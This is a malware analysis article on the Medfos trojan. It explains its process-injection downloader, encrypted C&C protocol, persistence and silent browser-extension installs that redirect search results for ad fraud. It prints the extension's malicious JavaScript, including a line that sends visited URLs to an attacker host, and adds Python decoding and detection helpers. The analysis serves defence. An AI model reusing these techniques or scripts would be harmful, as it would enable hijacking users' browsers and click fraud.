
Medfos: An All-purpose Redirector

2014-08-10 13:30

[This article originally appeared in Virus Bulletin](http://www.virusbtn.com/virusbulletin/archive/2014/01/vb201401-Medfos)

<br/>

Medfos is a heavily obfuscated trojan family which downloads modules capable of redirecting search engine results in the most popular browsers, including Chrome, Firefox and Internet Explorer. Its main module, the downloader, was found to be distributed via the Sasfis botnet. This article dissects the way the Medfos downloader deploys its downloaded modules, and the function of each.

<p style="text-indent: 0pt;line-height: 9pt;text-align: left;"><br/></p><h3 style="padding-left: 5pt;text-indent: 0pt;text-align: left;">THE DLL DOWNLOADER</h3>

<p style="padding-top: 4pt;padding-left: 5pt;text-indent: 0pt;text-align: left;">The outermost layer of the Medfos downloader acts as a code injector into the msiexec.exe process, where its main payload runs. The assembly code is heavily obfuscated. It uses a combination of encrypted strings, dummy calls, junk code and opaque predicates, which cause <i>IDA</i> to split functions up inaccurately with its default settings, and make the function graph overview window too complex to navigate if the 'Create functions if call is present' option is turned off.</p>

<p style="padding-top: 4pt;padding-left: 5pt;text-indent: 0pt;text-align: left;">First, Medfos obtains the handle of %system%/msiexec.exe by calling NtOpenFile. Prior to creating a process using the newly acquired file handle, the ZwCreateSection and NtMapViewOfSection routines are called to obtain a mapped view of msiexec.exe where the malware prepares and inserts decoded chunks of malicious code.</p>
<p style="text-indent: 0pt;text-align: left;"><span><img width="415" height="251" alt="image" src="http://blog.fortinet.com/uploads/media/security-research/medfos1.png"/></span></p>
<p class="s3" style="padding-left: 0pt;text-indent: 0pt;text-align: center;">Figure 1: Anti-API hook.</p>

<p style="padding-left: 5pt;text-indent: 0pt;text-align: left;">CreateProcessInternalW is then used to create an instance of the msiexec.exe process in a suspended state. In between the typical NtGetContextThread and NtResumeThread API calls, the code injection is performed by two NtMapViewOfSection calls. The first NtMapViewOfSection call maps the bulk of the malicious code into the suspended process, while the second changes the entry point bytes of the suspended process to a jump into the malicious code.</p>

<p style="padding-top: 4pt;padding-left: 5pt;text-indent: 0pt;text-align: left;">When the host process resumes the thread of the injected msiexec.exe, the injected process performs its function as a downloader. It resolves some critical APIs and employs an anti-API-hooking technique. As shown in Figure 1, the first five instructions of InternetOpenURL are copied to an allocated buffer at memory location 0x9400A0. When the trojan wants to call InternetOpenURL, it calls location 0x9400A0 instead; the copied instructions are followed by a jump to the sixth instruction of the original InternetOpenURL, at 0x771C5A6A. Thus it sidesteps any API hook that patches the first five instructions of the original function.</p>

<p style="padding-top: 4pt;padding-left: 5pt;text-indent: 0pt;text-align: left;">After some preparation, the downloader checks for network connectivity by attempting to connect to <i>Google</i>. If a network connection is verified, it issues a DNS query for cdn169.filesnetupload.com, which, at the time of writing, resolved to 78.140.131.159. However, the malware subsequently connects to the C&amp;C server at 78.131.140.159 and reads at most 0x108FF0 bytes of data. The server IP is a string decrypted at runtime, and the DNS query is probably a smokescreen intended to distract users and malware analysts. As shown in Figure 2, when communicating with the C&amp;C server, the HTTP Host header is set to www.microsoft.com to further confuse the user. The data sent to the server is a hard-coded string that pretends to download a file from a legitimate site which has nothing to do with the C&amp;C server.</p>

<p style="padding-top: 3pt;padding-left: 5pt;text-indent: 0pt;text-align: left;">The response from the C&amp;C server is encrypted with a simplified version of the Tiny Encryption Algorithm (TEA), with all four 32-bit key words hard-coded to 0x12345678. As illustrated in Figure 3 and Table 1, the server response contains two structures, each consisting of a five-DWORD header followed by the body of a portable executable (PE).</p>

<p style="padding-top: 3pt;padding-left: 5pt;text-indent: 0pt;text-align: left;">Note that, as shown in Figure 3 and Table 1, the fourth DWORD is a hash of the name of the DLL export that the downloader will call; the same export name is later used in the Run key that the DLL sets up for itself. The downloaded DLL may differ from one request to the next, as the server always responds with the newest variant.</p>
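The response format just described, decoded end to end as an added example (not code from the article or from Fortinet): TEA with the four key words set to 0x12345678, the five-DWORD header walk of Table 1, the byte-sum checksum and the ror-7/XOR export-name hash. The article calls the cipher a 'simplified' TEA without saying how it is simplified, so standard 32-round TEA on little-endian 64-bit blocks, a hash starting value of 0, little-endian header DWORDs and the constructed sample response are all assumptions of mine.

```python
"""Decoder for the two-structure C&C response described above.

Added example; not code from the article or from Fortinet. Assumptions:
the 'simplified TEA' is modelled as standard 32-round TEA on little-endian
64-bit blocks, the export-name hash starts at 0, and header DWORDs are
little-endian. The sample response is constructed here, not real traffic.
"""
import struct

MASK32 = 0xFFFFFFFF
DELTA = 0x9E3779B9
KEY = (0x12345678,) * 4       # all four 32-bit key words hard-coded


def tea_decrypt_block(v0, v1, key=KEY, rounds=32):
    """Standard TEA decryption of one 64-bit block (two 32-bit words)."""
    k0, k1, k2, k3 = key
    s = (DELTA * rounds) & MASK32
    for _ in range(rounds):
        v1 = (v1 - (((v0 << 4) + k2) ^ (v0 + s) ^ ((v0 >> 5) + k3))) & MASK32
        v0 = (v0 - (((v1 << 4) + k0) ^ (v1 + s) ^ ((v1 >> 5) + k1))) & MASK32
        s = (s - DELTA) & MASK32
    return v0, v1


def tea_encrypt_block(v0, v1, key=KEY, rounds=32):
    """TEA encryption; only used to build the constructed sample."""
    k0, k1, k2, k3 = key
    s = 0
    for _ in range(rounds):
        s = (s + DELTA) & MASK32
        v0 = (v0 + (((v1 << 4) + k0) ^ (v1 + s) ^ ((v1 >> 5) + k1))) & MASK32
        v1 = (v1 + (((v0 << 4) + k2) ^ (v0 + s) ^ ((v0 >> 5) + k3))) & MASK32
    return v0, v1


def tea_ecb(data, block_fn):
    """Apply block_fn to every whole 8-byte block; a trailing partial block is copied."""
    whole = len(data) - len(data) % 8
    out = bytearray()
    for off in range(0, whole, 8):
        v0, v1 = struct.unpack_from('<II', data, off)
        out += struct.pack('<II', *block_fn(v0, v1))
    out += data[whole:]
    return bytes(out)


def export_name_hash(name):
    """Hash from Table 1: for each character C, CKM = ror32(CKM, 7) ^ C."""
    ckm = 0
    for c in name.encode('ascii'):
        ckm = ((ckm >> 7) | (ckm << 25)) & MASK32
        ckm ^= c
    return ckm


def parse_response(plain):
    """Walk the five-DWORD headers of Table 1 and return one dict per module.
    Raises ValueError on a truncated structure or a bad checksum."""
    modules, off = [], 0
    while off + 20 <= len(plain):
        _reserved, checksum, size, exp_hash, end = struct.unpack_from('<5I', plain, off)
        pe = plain[off + 20:off + 20 + size]
        if len(pe) != size or end < off + 20 + size or end > len(plain):
            raise ValueError('truncated or inconsistent structure at offset %d' % off)
        if sum(pe) & MASK32 != checksum:           # checksum = plain byte sum
            raise ValueError('checksum mismatch at offset %d' % off)
        modules.append({'checksum': checksum, 'size': size,
                        'export_hash': exp_hash, 'pe': pe})
        off = end                                  # DWORD 5: absolute end offset
    return modules


def decode_response(cipher):
    return parse_response(tea_ecb(cipher, tea_decrypt_block))


def build_sample_response():
    """Constructed sample: two fake 'MZ' bodies laid out per Table 1, then TEA-encrypted."""
    bodies = [(b'MZ' + b'\x90' * 30, 'Run'), (b'MZ' + b'\xCC' * 13, 'Start')]
    buf = bytearray()
    for pe, export in bodies:
        end = len(buf) + 20 + len(pe)
        buf += struct.pack('<5I', 0, sum(pe) & MASK32, len(pe),
                           export_name_hash(export), end)
        buf += pe
    buf += b'\x00' * (-len(buf) % 8)               # pad to whole TEA blocks
    return tea_ecb(bytes(buf), tea_encrypt_block)


if __name__ == '__main__':
    for m in decode_response(build_sample_response()):
        print('size=%d export_hash=0x%08X starts=%r' % (m['size'], m['export_hash'], m['pe'][:2]))
```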

<p style="padding-top: 5pt;padding-left: 6pt;text-indent: 0pt;text-align: left;"><img width="351" height="256" alt="image" src="http://blog.fortinet.com/uploads/media/security-research/medfos2.png"/></p>
<p style="text-indent: 0pt;line-height: 10pt;text-align: left;"><br/></p><p class="s3" style="padding-top: 5pt;padding-left: 24pt;text-indent: 0pt;text-align: center;">Figure 2: The host is set to www.microsoft.com, but the GET message is sent to IP 78.140.131.159.</p>

<p style="padding-top: 6pt;padding-left: 5pt;text-indent: 0pt;text-align: left;"><span><img width="351" height="239" alt="image" src="http://blog.fortinet.com/uploads/media/security-research/medfos3.png"/></span></p><p class="s3" style="padding-top: 5pt;padding-left: 6pt;text-indent: 0pt;text-align: center;">Figure 3: Decoded responses.</p>

<p style="padding-top: 3pt;padding-left: 5pt;text-indent: 0pt;text-align: left;">The downloaded DLL is loaded and initialized using ntdll.LdrLoadDll(). Most parts of the DLL are encrypted, and initializing the DLL performs the decryption. To start the payload of the downloaded DLL, the export identified by the fourth DWORD is called. When it is called from within the host Medfos downloader, a constant is pushed as the argument to the export function; by comparing the argument with that constant, the downloaded module can determine whether it is being invoked 'legitimately'. Called within the downloader, the DLL first drops a copy of itself into %Application Data% under a name consisting of six randomly generated alphabetic characters. Then it adds the following value under the registry key 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run' to make sure it is executed at start-up:</p>

<p style="padding-top: 4pt;padding-left: 11pt;text-indent: 0pt;text-align: left;">&lt;DLL name&gt; = rundll32.exe &lt;DLL path and DLL name&gt;,&lt;ExportName&gt;</p>

<p style="padding-top: 4pt;padding-left: 5pt;text-indent: 0pt;text-align: left;">Just before returning from the export function, CreateProcessW is called with the same rundll32.exe command line as the Run value just created, so that the dropped DLL is executed immediately.</p>
<!--new heading-->

<p style="text-indent: 0pt;line-height: 9pt;text-align: left;"><br/></p><h3 style="padding-left: 5pt;text-indent: 0pt;text-align: left;">DLL MODULE - REDIRECTOR</h3>
<!--end of new heading-->

<p style="padding-top: 4pt;padding-left: 5pt;text-indent: 0pt;text-align: left;">One of the downloaded DLL modules is a search result redirector for <i>Google Chrome</i>, <i>Mozilla Firefox</i> and <i>Internet Explorer</i>. Figure 4 shows search result redirection under <i>Internet Explorer</i>, while Figure 5 displays the network traffic generated during the multi-stage redirection process. As mentioned above, loading the DLL module decrypts it, and the decrypted module uses a different style of code obfuscation from its downloader. Strings are decrypted only immediately prior to their use and are erased straight afterwards. APIs are likewise resolved only at runtime.</p>

<!--heading start-->
<p style="text-indent: 0pt;line-height: 9pt;text-align: left;"><br/></p><h3 style="padding-left: 5pt;text-indent: 0pt;text-align: left;">CHROME REDIRECT</h3>
<!--heading end-->

<p style="padding-top: 4pt;padding-left: 5pt;text-indent: 0pt;text-align: left;">After the redirector DLL module is executed, it drops and installs a .crx <i>Google Chrome </i>extension package.</p><p style="text-indent: 0pt;line-height: 14pt;text-align: left;"><br/></p>

<!--table start-->
<table style="border-collapse:collapse;width:487pt;margin-left:22.05pt" cellspacing="0"><tr><td style="border-top-style:solid;border-top-width:1pt;border-top-color:#231F20;border-left-style:solid;border-left-width:1pt;border-left-color:#231F20;border-bottom-style:solid;border-bottom-width:1pt;border-bottom-color:#231F20;border-right-style:solid;border-right-width:1pt;border-right-color:#231F20"><p class="s5" style="padding-top: 1pt;padding-left: 3pt;text-indent: 0pt;text-align: left;">DWORD</p></td><td style="border-top-style:solid;border-top-width:1pt;border-top-color:#231F20;border-left-style:solid;border-left-width:1pt;border-left-color:#231F20;border-bottom-style:solid;border-bottom-width:1pt;border-bottom-color:#231F20;border-right-style:solid;border-right-width:1pt;border-right-color:#231F20"><p class="s5" style="padding-top: 1pt;padding-left: 3pt;text-indent: 0pt;text-align: left;">Use</p></td><td style="border-top-style:solid;border-top-width:1pt;border-top-color:#231F20;border-left-style:solid;border-left-width:1pt;border-left-color:#231F20;border-bottom-style:solid;border-bottom-width:1pt;border-bottom-color:#231F20;border-right-style:solid;border-right-width:1pt;border-right-color:#231F20"><p class="s5" style="padding-top: 1pt;padding-left: 3pt;text-indent: 0pt;text-align: left;">Note</p></td></tr><tr><td style="border-top-style:solid;border-top-width:1pt;border-top-color:#231F20;border-left-style:solid;border-left-width:1pt;border-left-color:#231F20;border-bottom-style:solid;border-bottom-width:1pt;border-bottom-color:#231F20;border-right-style:solid;border-right-width:1pt;border-right-color:#231F20"><p class="s6" style="padding-top: 1pt;padding-left: 3pt;text-indent: 0pt;text-align: left;">1</p></td><td 
style="border-top-style:solid;border-top-width:1pt;border-top-color:#231F20;border-left-style:solid;border-left-width:1pt;border-left-color:#231F20;border-bottom-style:solid;border-bottom-width:1pt;border-bottom-color:#231F20;border-right-style:solid;border-right-width:1pt;border-right-color:#231F20"><p class="s6" style="padding-top: 1pt;padding-left: 3pt;text-indent: 0pt;text-align: left;">Reserved</p></td><td style="border-top-style:solid;border-top-width:1pt;border-top-color:#231F20;border-left-style:solid;border-left-width:1pt;border-left-color:#231F20;border-bottom-style:solid;border-bottom-width:1pt;border-bottom-color:#231F20;border-right-style:solid;border-right-width:1pt;border-right-color:#231F20"><p class="s6" style="padding-top: 1pt;padding-left: 3pt;text-indent: 0pt;text-align: left;">Not used</p></td></tr><tr><td style="border-top-style:solid;border-top-width:1pt;border-top-color:#231F20;border-left-style:solid;border-left-width:1pt;border-left-color:#231F20;border-bottom-style:solid;border-bottom-width:1pt;border-bottom-color:#231F20;border-right-style:solid;border-right-width:1pt;border-right-color:#231F20"><p class="s6" style="padding-top: 6pt;padding-left: 3pt;text-indent: 0pt;text-align: left;">2</p></td><td style="border-top-style:solid;border-top-width:1pt;border-top-color:#231F20;border-left-style:solid;border-left-width:1pt;border-left-color:#231F20;border-bottom-style:solid;border-bottom-width:1pt;border-bottom-color:#231F20;border-right-style:solid;border-right-width:1pt;border-right-color:#231F20"><p class="s6" style="padding-top: 1pt;padding-left: 3pt;padding-right: 22pt;text-indent: 0pt;text-align: left;">A checksum of the PE contained in the current structure</p></td><td 
style="border-top-style:solid;border-top-width:1pt;border-top-color:#231F20;border-left-style:solid;border-left-width:1pt;border-left-color:#231F20;border-bottom-style:solid;border-bottom-width:1pt;border-bottom-color:#231F20;border-right-style:solid;border-right-width:1pt;border-right-color:#231F20"><p class="s6" style="padding-top: 6pt;padding-left: 3pt;text-indent: 0pt;text-align: left;">The checksum is a simple summation of all bytes in the PE</p></td></tr><tr><td style="border-top-style:solid;border-top-width:1pt;border-top-color:#231F20;border-left-style:solid;border-left-width:1pt;border-left-color:#231F20;border-bottom-style:solid;border-bottom-width:1pt;border-bottom-color:#231F20;border-right-style:solid;border-right-width:1pt;border-right-color:#231F20"><p class="s6" style="padding-top: 1pt;padding-left: 3pt;text-indent: 0pt;text-align: left;">3</p></td><td style="border-top-style:solid;border-top-width:1pt;border-top-color:#231F20;border-left-style:solid;border-left-width:1pt;border-left-color:#231F20;border-bottom-style:solid;border-bottom-width:1pt;border-bottom-color:#231F20;border-right-style:solid;border-right-width:1pt;border-right-color:#231F20"><p class="s6" style="padding-top: 1pt;padding-left: 3pt;text-indent: 0pt;text-align: left;">Size of the PE in current structure</p></td><td style="border-top-style:solid;border-top-width:1pt;border-top-color:#231F20;border-left-style:solid;border-left-width:1pt;border-left-color:#231F20;border-bottom-style:solid;border-bottom-width:1pt;border-bottom-color:#231F20;border-right-style:solid;border-right-width:1pt;border-right-color:#231F20"/></tr><tr><td style="border-top-style:solid;border-top-width:1pt;border-top-color:#231F20;border-left-style:solid;border-left-width:1pt;border-left-color:#231F20;border-bottom-style:solid;border-bottom-width:1pt;border-bottom-color:#231F20;border-right-style:solid;border-right-width:1pt;border-right-color:#231F20"><p style="text-indent: 0pt;line-height: 7pt;text-align: 
left;"><br/></p><p class="s6" style="padding-left: 3pt;text-indent: 0pt;text-align: left;">4</p></td><td style="border-top-style:solid;border-top-width:1pt;border-top-color:#231F20;border-left-style:solid;border-left-width:1pt;border-left-color:#231F20;border-bottom-style:solid;border-bottom-width:1pt;border-bottom-color:#231F20;border-right-style:solid;border-right-width:1pt;border-right-color:#231F20"><p style="text-indent: 0pt;line-height: 7pt;text-align: left;"><br/></p><p class="s6" style="padding-left: 3pt;text-indent: 0pt;text-align: left;">Hash of export name to be called</p></td><td style="border-top-style:solid;border-top-width:1pt;border-top-color:#231F20;border-left-style:solid;border-left-width:1pt;border-left-color:#231F20;border-bottom-style:solid;border-bottom-width:1pt;border-bottom-color:#231F20;border-right-style:solid;border-right-width:1pt;border-right-color:#231F20"><p class="s6" style="padding-top: 1pt;padding-left: 3pt;padding-right: 97pt;text-indent: 0pt;line-height: 143%;text-align: left;">The checksum pseudo algorithm: For C = each character in NAME,</p><p class="s6" style="padding-left: 12pt;text-indent: 0pt;text-align: left;">CKM = CKM ror 7</p><p class="s6" style="padding-top: 4pt;padding-left: 12pt;text-indent: 0pt;text-align: left;">CKM = CKM ^ C</p></td></tr><tr><td style="border-top-style:solid;border-top-width:1pt;border-top-color:#231F20;border-left-style:solid;border-left-width:1pt;border-left-color:#231F20;border-bottom-style:solid;border-bottom-width:1pt;border-bottom-color:#231F20;border-right-style:solid;border-right-width:1pt;border-right-color:#231F20"><p class="s6" style="padding-top: 1pt;padding-left: 3pt;text-indent: 0pt;text-align: left;">5</p></td><td 
style="border-top-style:solid;border-top-width:1pt;border-top-color:#231F20;border-left-style:solid;border-left-width:1pt;border-left-color:#231F20;border-bottom-style:solid;border-bottom-width:1pt;border-bottom-color:#231F20;border-right-style:solid;border-right-width:1pt;border-right-color:#231F20"><p class="s6" style="padding-top: 1pt;padding-left: 3pt;text-indent: 0pt;text-align: left;">End of this structure</p></td><td style="border-top-style:solid;border-top-width:1pt;border-top-color:#231F20;border-left-style:solid;border-left-width:1pt;border-left-color:#231F20;border-bottom-style:solid;border-bottom-width:1pt;border-bottom-color:#231F20;border-right-style:solid;border-right-width:1pt;border-right-color:#231F20"><p class="s6" style="padding-top: 1pt;padding-left: 3pt;text-indent: 0pt;text-align: left;">Absolute number of bytes from the beginning of buffer</p></td></tr><tr><td style="border-top-style:solid;border-top-width:1pt;border-top-color:#231F20;border-left-style:solid;border-left-width:1pt;border-left-color:#231F20;border-bottom-style:solid;border-bottom-width:1pt;border-bottom-color:#231F20;border-right-style:solid;border-right-width:1pt;border-right-color:#231F20"><p class="s6" style="padding-top: 1pt;padding-left: 3pt;text-indent: 0pt;text-align: left;">6+</p></td><td style="border-top-style:solid;border-top-width:1pt;border-top-color:#231F20;border-left-style:solid;border-left-width:1pt;border-left-color:#231F20;border-bottom-style:solid;border-bottom-width:1pt;border-bottom-color:#231F20;border-right-style:solid;border-right-width:1pt;border-right-color:#231F20"><p class="s6" style="padding-top: 1pt;padding-left: 3pt;text-indent: 0pt;text-align: left;">The PE bytes</p></td><td 
style="border-top-style:solid;border-top-width:1pt;border-top-color:#231F20;border-left-style:solid;border-left-width:1pt;border-left-color:#231F20;border-bottom-style:solid;border-bottom-width:1pt;border-bottom-color:#231F20;border-right-style:solid;border-right-width:1pt;border-right-color:#231F20"/></tr></table>
<!--table end-->

<p class="s3" style="padding-top: 2pt;padding-left: 183pt;text-indent: 0pt;text-align: left;">Table 1: Structure of the decoded response.</p>

<!--figure 4-->
<p style="text-indent: 0pt;line-height: 6pt;text-align: left;"><br/></p><p style="padding-left: 76pt;text-indent: 0pt;text-align: left;"><span><img width="458" height="266" alt="image" src="http://blog.fortinet.com/uploads/media/security-research/medfos4.png"/></span></p>

<p class="s3" style="padding-top: 6pt;padding-left: 44pt;text-indent: 0pt;text-align: center;">Figure 4: Search result redirection. Notice that the topic of the redirected page is related to the search term.</p>
<!--end figure-->

<!--figure 5-->
<p style="text-indent: 0pt;line-height: 12pt;text-align: left;"><br/></p><p style="padding-left: 29pt;text-indent: 0pt;text-align: left;"><span><img width="579" height="370" alt="image" src="http://blog.fortinet.com/uploads/media/security-research/medfos5.png"/></span></p>
<p style="text-indent: 0pt;line-height: 9pt;text-align: left;"><br/></p><p class="s3" style="padding-left: 44pt;text-indent: 0pt;text-align: center;">Figure 5: Result of clicking on a link after searching for the term 'penny stock'.</p>
<!--end figure-->

<p style="text-indent: 0pt;line-height: 6pt;text-align: left;"><br/></p><p style="padding-top: 3pt;padding-left: 5pt;text-indent: 0pt;text-align: left;">The extension package is first decoded and dropped into %Administrator\Local Settings\Application Data% with a randomly generated name in GUID (globally unique identifier) format. Then, to trigger installation of the Chrome extension, the following registry key is added [1]:</p>

<p style="padding-top: 0pt;padding-left: 11pt;text-indent: 0pt;text-align: left;">HKLM\Software\Google\Chrome\Extensions\&lt;32 randomly generated lower case characters&gt;</p>

<p style="padding-top: 0pt;padding-left: 11pt;text-indent: 0pt;text-align: left;">path = &lt;full path of the .crx file&gt;</p>
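A defender-side check for the registration above, written as an added example (not the article's or Fortinet's code): on Windows it enumerates HKLM\Software\Google\Chrome\Extensions and flags entries whose 'path' value points at a .crx named like a GUID under a per-user Application Data folder, the pattern the article describes. The GUID-filename heuristic, the extra Wow6432Node lookup and the rule that genuine Chrome extension ids consist of 32 characters from a to p are my own assumptions; the sample entries are constructed.

```python
"""Hunt for the Chrome external-extension registration described above.

Added example; not code from the article or from Fortinet. On Windows it
reads HKLM\\Software\\Google\\Chrome\\Extensions\\<id>\\path (plus the
Wow6432Node view, an assumption) and scores each entry. The scoring rules,
including the a-p alphabet of genuine Chrome extension ids, are my own.
"""
import re
import sys

# Genuine Chrome extension ids are 32 characters drawn from 'a'..'p' only.
CHROME_ID = re.compile(r'^[a-p]{32}$')
# <backslash>{GUID}.crx or <backslash>GUID.crx at the end of the path
GUID_CRX = re.compile(
    r'\\\{?[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\}?\.crx$',
    re.IGNORECASE)
PER_USER_DIR = re.compile(r'\\(Local Settings\\)?Application Data\\', re.IGNORECASE)
REG_PATHS = (r'Software\Google\Chrome\Extensions',
             r'Software\Wow6432Node\Google\Chrome\Extensions')

# Constructed sample entries: one benign-looking vendor package and one that
# matches the article's pattern. Not taken from a real system.
SAMPLE_ENTRIES = [
    ('abcdefghijklmnopabcdefghijklmnop', r'C:\Program Files\Vendor\vendor-toolbar.crx'),
    ('qwertyuiopzxcvbnmqwertyuiopzxcvb',
     r'C:\Documents and Settings\Administrator\Local Settings\Application Data'
     r'\{1f2e3d4c-5b6a-7988-9a0b-c1d2e3f4a5b6}.crx'),
]


def assess_entry(ext_id, crx_path):
    """Return the list of reasons an entry looks suspicious (empty = clean)."""
    reasons = []
    if not CHROME_ID.match(ext_id):
        reasons.append('id is not a valid Chrome extension id (32 chars, a-p)')
    if crx_path and GUID_CRX.search(crx_path):
        reasons.append('.crx file is named like a GUID')
    if crx_path and PER_USER_DIR.search(crx_path):
        reasons.append('.crx is stored under a per-user Application Data folder')
    return reasons


def scan_entries(entries):
    """entries: iterable of (extension_id, path). Returns [(id, path, reasons)]."""
    flagged = []
    for ext_id, path in entries:
        reasons = assess_entry(ext_id, path)
        if reasons:
            flagged.append((ext_id, path, reasons))
    return flagged


def read_registry_entries():
    """Windows only: collect (id, path) pairs from the external-extension keys."""
    import winreg
    found = []
    for base in REG_PATHS:
        try:
            root = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, base)
        except OSError:
            continue
        with root:
            for idx in range(winreg.QueryInfoKey(root)[0]):
                ext_id = winreg.EnumKey(root, idx)
                with winreg.OpenKey(root, ext_id) as sub:
                    try:
                        path = winreg.QueryValueEx(sub, 'path')[0]
                    except OSError:
                        path = None
                found.append((ext_id, path))
    return found


if __name__ == '__main__':
    entries = read_registry_entries() if sys.platform == 'win32' else SAMPLE_ENTRIES
    for ext_id, path, reasons in scan_entries(entries):
        print(ext_id, path)
        for r in reasons:
            print('   -', r)
```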

<p style="padding-top: 0pt;padding-left: 5pt;text-indent: 0pt;text-align: left;">The strings contained in the <i>Chrome </i>extension scripts are encoded. The pseudo code of the decryption routine is as follows:</p>

<!--inline code-->
<p class="s7" style="padding-top: 0pt;padding-left: 23pt;text-indent: 0pt;line-height: 141%;text-align: left;">Key = 0; </p>
<p class="s7" style="padding-top: 0pt;padding-left: 23pt;text-indent: 0pt;line-height: 141%;text-align: left;">OutString = "";</p>
<p class="s7" style="padding-left: 10pt;text-indent: 0pt;text-align: left;">For Byte in Input:</p><p class="s7" style="padding-top: 0pt;padding-left: 40pt;text-indent: 0pt;text-align: left;">Byte = Byte ^ (Key&amp;0xFF);</p><p class="s7" style="padding-top: 0pt;padding-left: 40pt;text-indent: 0pt;line-height: 141%;text-align: left;">OutString = OutString + toChar(Byte); Key++;</p><p class="s7" style="padding-left: 23pt;text-indent: 0pt;text-align: left;">End For</p><p class="s7" style="padding-top: 0pt;padding-left: 23pt;text-indent: 0pt;text-align: left;">Return OutString;</p>
<!--end inline code-->

<p style="padding-top: 0pt;padding-left: 5pt;text-indent: 0pt;text-align: left;">The Appendix [2] contains the de-obfuscated equivalent of the scripts contained within the .crx package. Once installed, the extension parses the document.location.href using regular expression matching. Depending on the situation, one of the following two actions might be triggered:</p>

<p style="padding-top: 0pt;padding-left: 22pt;text-indent: -14pt;text-align: left;">If <i>Google Instant </i>search is detected, the script injected is:</p>

<p style="padding-top: 0pt;padding-left: 22pt;text-indent: 0pt;text-align: left;"><a href="http://disable-instant-search.com/js/disable.js" class="s8" target="_blank">http://disable-instant-search.com/js/disable.js</a></p>

<p style="padding-top: 0pt;padding-left: 22pt;text-indent: 0pt;text-align: left;">This contains the following JavaScript:</p>

<p class="s7" style="padding-top: 0pt;padding-left: 10pt;text-indent: 0pt;text-align: left;">try {</p>
<p class="s7" style="padding-left: 22pt;text-indent: 0pt;text-align: left;">var Links = document.getElementsByTagName('a');</p>
<p class="s7" style="padding-left: 22pt;text-indent: 0pt;text-align: left;">var f = 0;</p>
<p class="s7" style="padding-left: 22pt;text-indent: 0pt;text-align: left;">for (var i = 0; f == 0 &amp;&amp; i &lt; Links.length; i++) {</p>
<p class="s7" style="padding-left: 34pt;text-indent: 0pt;text-align: left;">if (Links[i].href.indexOf('/setprefs?') != -1) {</p>
<p class="s7" style="padding-left: 47pt;text-indent: 0pt;text-align: left;">var t = Links[i].href.search(/sig=([^&amp;]+)/);</p>
<p class="s7" style="padding-left: 47pt;text-indent: 0pt;text-align: left;">if (t) {</p>
<p class="s7" style="padding-left: 58pt;text-indent: 0pt;text-align: left;">t = RegExp.$1;</p>
<p class="s7" style="padding-left: 58pt;text-indent: 0pt;text-align: left;">t = '/setprefs?&amp;sig=' + t + '&amp;suggon=2';</p>
<p class="s7" style="padding-left: 58pt;text-indent: 0pt;text-align: left;">var req = new XMLHttpRequest();</p>
<p class="s7" style="padding-left: 58pt;text-indent: 0pt;text-align: left;">req.open('GET', t);</p>
<p class="s7" style="padding-left: 58pt;text-indent: 0pt;text-align: left;">req.send();</p>
<p class="s7" style="padding-left: 58pt;text-indent: 0pt;text-align: left;">f = 1;</p>
<p class="s7" style="padding-left: 47pt;text-indent: 0pt;text-align: left;">}</p>
<p class="s7" style="padding-left: 34pt;text-indent: 0pt;text-align: left;">}</p>
<p class="s7" style="padding-left: 22pt;text-indent: 0pt;text-align: left;">}</p>
<p class="s7" style="padding-left: 10pt;text-indent: 0pt;text-align: left;">} catch (err) {}</p>

<p style="padding-top: 4pt;padding-left: 22pt;text-indent: 0pt;text-align: left;">If a link to a search result of one of the major search engines is identified, the injected script would be:</p>
<p class="s7" style="padding-top: 4pt;padding-left: 10pt;text-indent: 0pt;text-align: left;">ss+"?type="+k3+"&amp;user-agent=Mozilla%2F5.0+%28Windows+NT+5.1%29+AppleWebKit%2F534.30+%28KHTML%2C+like+Gecko%29+Chrome%2F12.0.742.112+Safari%2F534.30&amp;ip="+p+"&amp;ref="+encodeURIComponent(k2)+'&amp;'+kladsjnkf</p>

<p style="padding-top: 4pt;padding-left: 22pt;text-indent: 0pt;text-align: left;">Where:</p>
<p class="s3" style="padding-top: 4pt;padding-left: 22pt;text-indent: 0pt;text-align: left;">ss <span class="p">= 'http://chrome-revision.com/feed'</span></p>
<p class="s3" style="padding-top: 4pt;padding-left: 22pt;text-indent: 0pt;text-align: left;">k3 <span class="p">= 'search' if searching in </span>Google<span class="p">, </span>Yahoo!<span class="p">, </span>Ask<span class="p">, </span>Bing <span class="p">or </span>AOL</p>
<p class="s3" style="padding-top: 4pt;padding-left: 22pt;text-indent: 0pt;text-align: left;">k3 <span class="p">= 'empty' if visiting </span>Yahoo!<span class="p">, </span>Bing<span class="p">, </span>Ask <span class="p">or </span>AOL <span class="p">but not searching</span></p>
<p class="s3" style="padding-top: 3pt;padding-left: 22pt;text-indent: 0pt;text-align: left;">k2 <span class="p">= the current URL</span></p>
<p class="s3" style="padding-top: 4pt;padding-left: 22pt;text-indent: 0pt;text-align: left;">p <span class="p">= a randomly generated IP address starting with 84.</span></p>

<p style="padding-top: 4pt;padding-left: 5pt;text-indent: 0pt;text-align: left;">The 'http://chrome-revision.com/feed' URL may also return a gzipped script which redirects the page to 'http://googleads.i.doublee-click.net', as shown in the Appendix [2]. At this point, the server at 'http://googleads.i.doublee-click.net' might decide to redirect the browser further, to another domain. The choice of redirect target depends on the search term. During the redirection procedure, the browsing footprint is referred to a legitimate advertisement domain to simulate ad clicks and generate revenue for the author. The network traffic of such a process, generated by 'http://googleads.i.doublee-click.net', is illustrated in Figure 5.</p>
<p style="text-indent: 0pt;line-height: 9pt;text-align: left;"><br/></p>
<h3 style="padding-left: 5pt;text-indent: 0pt;text-align: left;">FIREFOX REDIRECT</h3>
<p style="padding-top: 4pt;padding-left: 5pt;text-indent: 0pt;text-align: left;">If <i>Mozilla Firefox</i> is found to be installed, a <i>Firefox</i> extension performing the same function as the <i>Chrome</i> extension is also installed. The script contained within the extension is essentially the <i>Firefox</i>-syntax equivalent of the <i>Chrome</i> extension's script. As <i>Firefox</i> does not officially offer a method to install an extension without user confirmation, a stealthier approach is taken here. To install the <i>Firefox</i> extension, the DLL module loads and calls the mozsqlite3.dll library, which allows direct modification of the database behind the <i>Firefox</i> browser. To be exact, it calls sqlite3_open16 to open the <i>Firefox</i> database, followed by a series of sqlite3_exec SQL statements, as shown in Figure 5, to set up the installation [3]. The DLL module then drops the file %&lt;Firefox extension folder&gt;%\&lt;randomly generated GUID&gt;.xpi to complete the installation of the extension. Note that the GUID entered into the <i>Firefox</i> sqlite database must match the filename of the .xpi file, 